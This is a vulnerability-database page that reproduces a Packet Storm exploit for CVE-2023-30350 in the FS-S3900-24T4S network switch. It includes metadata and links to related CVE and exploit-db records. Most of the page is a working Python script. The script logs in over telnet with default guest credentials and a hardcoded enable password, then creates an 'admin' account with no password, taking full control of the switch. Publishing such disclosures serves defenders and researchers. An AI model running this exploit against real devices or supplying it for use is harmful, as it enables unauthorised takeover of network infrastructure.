Lucene search
Daniele Linguaglossa, Alberto BruscinoPACKETSTORM:172124HistoryMay 03, 2023 - 12:00 a.m.
FS-S3900-24T4S Privilege Escalation
2023-05-0300:00:00
Daniele Linguaglossa, Alberto Bruscino
packetstormsecurity.com
171
exploit
privilege escalation
fs-s3900-24t4s
telnet
vulnerability
cve-2023-30350
security
EPSS
0.003
Percentile
71.0%
`# Exploit Title: FS-S3900-24T4S Privilege Escalation
# Date: 29/04/2023
# Exploit Author: Daniele Linguaglossa & Alberto Bruscino
# Vendor Homepage: https://www.fs.com/
# Software Link: not available
# Version: latest
# Tested on: latest
# CVE : CVE-2023-30350
import sys
import telnetlib
def exploit(args):
print(args)
if len(args) != 1:
print(f"Usage: {sys.argv[0]} <ip>")
sys.exit(1)
else:
ip = args[0]
try:
with telnetlib.Telnet(ip, 23) as tn:
try:
tn.read_until(b"Username: ")
tn.write(b"guest\r\n")
tn.read_until(b"Password: ")
tn.write(b"guest\r\n")
tn.read_until(b">")
tn.write(b"enable\r\n")
tn.read_until(b"Password: ")
tn.write(b"super\r\n")
tn.read_until(b"#")
tn.write(b"configure terminal\r\n")
tn.read_until(b"(config)#")
tn.write(b"username admin nopassword\r\n")
tn.read_until(b"(config)#")
print(
"Exploit success, you can now login with username: admin and password: <empty>")
tn.close()
except KeyboardInterrupt:
print("Exploit failed")
tn.close()
except ConnectionRefusedError:
print("Connection refused")
if __name__ == "__main__":
exploit(sys.argv[1:])
`
Related
cvelist
cvelist
CVE-2023-30350
2023-05-28 00:00:00
zdt
zdt
FS-S3900-24T4S - Privilege Escalation Exploit
2023-05-02 00:00:00
cve
cve
CVE-2023-30350
2023-05-29 00:15:09
prion
prion
Default credentials
2023-05-29 00:15:00
exploitdb
exploitdb
FS-S3900-24T4S - Privilege Escalation
2023-05-02 00:00:00
nvd
nvd
CVE-2023-30350
2023-05-29 00:15:09